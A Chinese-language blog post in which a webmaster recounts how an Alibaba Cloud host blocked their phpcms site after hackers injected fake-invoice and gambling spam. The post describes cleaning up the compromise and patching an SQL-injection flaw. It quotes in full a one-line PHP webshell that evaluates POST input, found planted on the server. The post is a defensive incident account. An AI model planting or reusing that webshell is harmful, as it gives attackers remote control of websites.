都說阿里雲的主機特別的穩定，價格還實惠，多年續費還打8折，心動已久。

2017年初正式把網站遷移到阿里雲主機上，備好案，一切正常運行，網站訪問速度比之前的西部數碼真的是快了好多倍啊，不愧是馬雲家的東西。
 
3月15日上午，手機突然收到了阿里雲的短信，提示我網站涉及違法不良信息被阿里雲屏蔽訪問處理。腦子頓時有點蒙圈，趕緊打開網站看一看，網站已經無法訪問了，心情糟糕透了。

QQ郵箱也收到了阿里雲的提示郵件，《違規URL屏蔽訪問處理通知》，如下圖所示：



尊敬的用戶：

您的網站URL：http://www.hifi.com.cn/content-80-3006-1.html涉及違法不良信息，違反了相關服務協議和《互聯網信息服務管理辦法》第十五條規定，目前阿里雲已對您的違法URL做屏蔽訪問處理。

如果您對本通知的內容存有疑問，請及時工單或者電話聯繫我們， 謝謝您對阿里雲的支持。
 
查看您網站涉及違禁商品類 -> 證件卡票

風險類型：違禁商品類-證件卡票

1、您需要將您的網站違法文件，違法頁面進行徹底整改刪除。（包括但不限於我們通知的內容）

2、需要您在公安備案平台 http://www.beian.gov.cn 申請公安備案，截圖並工單反饋申請開通。

 
特別注意：

第一次（7天累計違規網頁達100條） 阻斷域名完全整改、公安平台提交網站備案、參加網站安全管理考試及培訓。
 
第二次7天累計超過100條，我們會再次關停您的網站，並取消您的帳號參加阿里雲平台全年營銷活動的資格，阻斷域名且1年內禁止參加阿里雲平台營銷活動。
 
第三次我們將永久關停您的網站不再提供解鎖申請，並且您的帳號取消購買資格，後期將無法再在阿里雲平台進行任何產品購買。
 
打開阿里雲所說的鏈接地址：http://www.hifi.com.cn/content-80-3006-1.html

網站提示：該內容被禁止訪問





看了阿里雲的通知，我才意識到問題的嚴重性，在7天內不及時處理，網站就可能永久的被封了，停止訪問了，我續了3年的主機啊。大體瞭解了為什麼阿里雲會屏蔽

訪問處理我的網站，從頭到尾我把問題的解決過程記錄到我的日誌裡，希望能幫到更多遇到同樣情況的站長們。
 
第一步：首先看一下網站的百度的收錄情況。



百度裡site:網站，看到網站收錄都是一些代開發票的信息，還有一些博彩類的惡意內容。

點擊快照，竟然直接給跳轉到別人的網站上去了，我這才意識到原來是我網站被駭了，網站的程序代碼都被駭客篡改了，趕緊登陸主機檢查程序代碼。

content-80-3006-1.html 這個文件也存在於網站跟目錄下，打開一看確實都是一些代開發票，博彩的內容。又發現網站的根目錄下多了一個php文件，名字也起的好特別。





裡面竟然還有什麼蠟筆小新，下面的代碼都是加了密的，具體的內容沒有看到，應該是駭客的木馬文件，我隨即刪除了這個文件，又在其他文件夾下查到了一句話木馬代碼。

<?php var_dump(md5(123));$content=stripslashes($_POST[1]);eval($content);
 
這個木馬的作用是POST提交，可以直接上傳任意文件到網站目錄下，並控制網站的權限。
 
在目錄下還查到有一個TXT文件，裡面竟然是代開發票的內容，終於找到問題的根本了。



把以上發現的木馬文件都刪除後，在阿里雲工單裡，提交了工單，抓緊讓阿里雲技術檢查一下，還有沒有了，大約1個小時內技術回復我的工單了，暫時已經解除網站屏蔽，網站現已正常訪問了。
 
至此，關於阿里雲阻斷域名，屏蔽處理我網站的問題，徹底的得以解決，從頭到尾又反思了一下整個問題的根本，為什麼駭客會黑了我的網站，而且還上傳了木馬文件，這問題的本質應該是我的網站是有漏洞，

才會被駭客攻擊。按照這個思路，網站用的是phpcms系統，百度搜索了下phpcms 漏洞，發現phpcms最近爆出了高危漏洞，SQL注入獲取管理員密碼的漏洞，原來是程序確實有漏洞了，看了大牛們文章修復方案，

本身我是搞程序設計的，自己根據修復方案，修復了網站的漏洞。
 
程序代碼上的漏洞，需要有安全意識，懂程序代碼的程序員才能修復的了，如果自己不懂程序代碼，也可以找一些安全公司來解決，國內網站安全方面，也就esafe.tw和綠盟等等安全公司比較專業。